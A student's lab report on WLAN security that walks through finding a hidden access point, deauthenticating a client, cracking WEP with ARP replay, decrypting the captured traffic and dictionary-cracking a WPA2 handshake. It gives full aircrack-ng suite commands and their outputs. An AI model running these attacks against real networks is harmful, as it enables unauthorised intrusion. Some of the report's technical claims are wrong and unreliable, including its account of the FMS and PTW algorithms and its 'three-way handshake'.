#SecureCommunications #WLAN #Cracking #Sniffing #Wardriving

Abstract

This is the report submitted to the WLAN Security laboratory, that's why it maybe doesn't feel like a writeup. The laboratory consisted in the following: We were given just a part of a MAC address and the information that inside the university campus there was a router with a hidden wifi, which MAC address contained the partial one we were given. The first objective was to find it by performing wardriving, once we have found it we must break the WiFi security and obtain the Wifi password. After finding the password, the next objective was to find the URL of a webserver on which we need to do a foothold probe, also the web gives us a password that opens up a zip contianing the last needed resources for the last objective. Given a .pcap containing the handshake of a WPA2 wifi we must crack the password.

In each one of the 4 parts the structure is the following: It starts with a brief explanation of the scope/objective followed by table that contains the information requested by the teacher, afterwards there will be a number of questions written in bold followed by their corresponding anwsers.

Wardriving

Describe in detail the process you have employed to find out the hidden SSID of the deployed AP, the channel where it operates and the MAC addresses of the AP and the associated client. Specify a list of all the commands (incl. parameters) you have use for this purpose:

To launch Kismet from a non-root user, you must follow the next steps to set it up:

mkdir -p ~/.kismet 
nano ~/.kismet/kismet_httpd.conf 
# write the following lines to the file
httpd_username=admin 
httpd_password=admin 
httpd_listen=localhost 
httpd_port=2501
# save the file 
chmod 600 ~/.kismet/kismet_httpd.conf 
sudo usermod -aG kismet yourusername 

With the setup complete, we can launch the tool using the kismet command. After starting it, we can access the web server at http://localhost:2501/ . Once inside, we need to enable the data adapter corresponding to our Wi-Fi interface (this will activate monitor mode). The final step before starting our "treasure hunt" is to apply the MAC filter in the top-right search bar to avoid seeing other Wi-Fi access points.

Now we can begin wandering around the campus building in search of the AP. Once we’ve found the AP, we have almost all the information we need. At this point, we also need to set the channel our interface should lock onto from the data sources. We could wait to discover the AP’s SSID, but we can speed up the process by running a de-authentication attack targeting the client. To do so, run the following commands:

iwconfig wlan0mon channel 9 
sudo aireplay-ng -a 00:C0:CA:19:F1:20 --deauth 0 wlan0mon

After a few seconds we should have all the information about the AP. Finally we can close and stop kismet.

WEP Cracking

Describe in detail the process and commands (incl. parameters) you have employed to capture WLAN traffic, replay ARP messages (if necessary), and crack the WEP key:

In the first terminal, we run the following command (which will keep running until we capture enough IVs to crack the password):

sudo airodump-ng wlan0mon --bssid 00:C0:CA:19:F1:20 --channel 9 -w IVs

In a second terminal, we initiate a fake authentication by running:

sudo aireplay-ng -1 0 -e SecComms -a 00:C0:CA:19:F1:20 wlan0mon

Once the command completes and we see our MAC address appear in the first terminal, we can start the ARP reinjection attack in the second terminal (this command will also run continuously, but it can be stopped and restarted without any issues):

sudo aireplay-ng -b 00:C0:CA:19:F1:20 -3 wlan0mon

Since a large number of IVs are required to crack the password, we have two options to speed up the process. The first option is to perform the attack with more people (e.g., using both of our laptops simultaneously) or alongside other classmates (but not too many, as this could cause interference). The second option is to execute additional de-authentication attacks by repeating the last command from the wardriving section, which forces the client to reconnect to the AP and generates more ARP requests for us to reinject. Periodically, we can pause the command in the first terminal by pressing the spacebar, then in another terminal, we check if we have captured enough IVs by running the following cracking command:

aircrack-ng -b 00:C0:CA:19:F1:20 IVs.cap

If we haven't captured enough IVs, we press the spacebar again in the first terminal to continue capturing packets. This process should be repeated until the key is cracked. In our case, it took approximately 1 hour and 30 minutes (we didn’t knew the second method to speed up the capture at the beginning). Note: During this process, there were at least four pairs of people in the same location, some at the same step, which may have impacted the timing.Using the previous cracking command, we employ the Fluhrer-Mantin-Shamir (FMS) algorithm, which is the default and requires the least amount of captured IVs to crack the password. An alternative is the Pyshkin-Tews-Weinmann (PTW) algorithm, which needs a larger number of IVs to crack the password, but still within a reasonable time. To use this alternative, you can add the -K flag to the cracking command. Since the most time consuming step is the capture proccess we just executed successfully the first algorithm (but anyways have tried the other one to test it).

Final output of the aircrack-ng command:

Aircrack-ng 1.7 

    [00:00:00] Tested 823 keys (got 49547 IVs) 
    KB depth byte(vote) 
    0 2/ 6 01(58624) 94(57600) 74(57344) E4(57088) 82(56832) E1(56576) 26(56320) B9(56064) 
    1 2/ 3 64(60160) 51(58368) 17(58112) 15(57856) 58(57088) 40(56576) 6D(56576) 3E(56320) 
    2 9/ 2 E7(56064) AB(55808) 06(55552) 37(55552) F0(55552) 33(55040) 60(55040) D9(55040) 
    3 6/ 3 33(57088) 58(56832) 60(56832) A8(56832) ED(56832) 2A(56064) B9(55808) D9(55296) 
    4 0/ 1 68(65792) C1(57856) AC(57344) 4F(57088) DC(56832) 27(56576) 4D(56576) 98(56576) 

    KEY FOUND! [ 53:65:63:43:6F:6D:6D:73:3B:32:30:31:37 ] (ASCII: SecComms;2017 ) 
    Decrypted correctly: 100%

WLAN Sniffing

Describe in detail the process and commands (incl. parameters) you have employed to decrypt the captured WLAN traffic, how you have analysed such traffic to find the web page being visited by the client station, and how you have join the WLAN in order to submit your information at the server:

First, we need to decrypt the captured traffic. While we could capture new traffic comming from the network, it would be a waste of time, since we have already captured enough in the second part of the lab. To decrypt the existing traffic, we run the following command:

airdecap-ng -w 53:65:63:43:6F:6D:6D:73:3B:32:30:31:37 -e SecComms IVs.cap

This will generate a decrypted .cap file with the same name as the original, but ending in -dec.cap. To explore the content of this file, we use WireShark, which allows us to analyze the traffic and follow specific "conversations" (such as tracking an HTTP connection). Normally, we would apply a filter like _ws.col.protocol == "HTTP" to view only HTTP traffic, but we were fortunate to see an HTTP request right away when we opened the capture.

Once we have the desired URL, we just need to connect to the Wi-Fi and access the web server. On Windows, this is done by expanding the list of available Wi-Fi networks in the toolbar, where a "Hidden network" appears. You can enter the SSID "SecComms" and the password, which will automatically connect you to the WPA-protected network named "SecComms2." After successfully joining the WLAN, simply open a web browser, enter the URL, fill out the form on the website, and press the submit button—that's it.

WPA password crack

Describe in detail the process and commands (incl. parameters) you have employed to identify the data and decrypt the key for the provided WPA2 capture.

After extracting the contents of the .zip file using the password obtained from the web server in the third part, we run the following command to retrieve basic information about the access point (AP) and the client:

airodump-ng -r WPA_troubleshooting_user.cap-01.cap

Next, to crack the password, we perform a dictionary brute-force attack. For this, we’ve chosen one of the most well-known dictionaries that comes pre-installed with Kali Linux: RockYou.txt. The command requires the path to our dictionary, the SSID of the access point whose password we want to crack, and the .cap file containing the three-way handshake (usually captured by performing a de-authentication attack on a client). The final command is as follows:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:12:17:D4:96:EC WPA_troubleshooting_user.cap-01.cap

Here is the final output:

Aircrack-ng 1.7 

    [00:00:00] 1094/10303727 keys tested (25011.93 k/s) 
    Time left: 6 minutes, 51 seconds 0.01% 

                KEY FOUND! [ 1q2w3e4r ] 

    Master Key : 1E 00 C7 54 74 61 45 72 6B 6C 46 4C 15 32 
        81 D0 2D 25 03 B7 0E 8F 82 43 3E 93 E0 33 AC 1D 1E 46

    Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

    EAPOL HMAC : E0 19 54 C8 EC 47 58 13 28 C2 21 1C C5 2A 3E 4E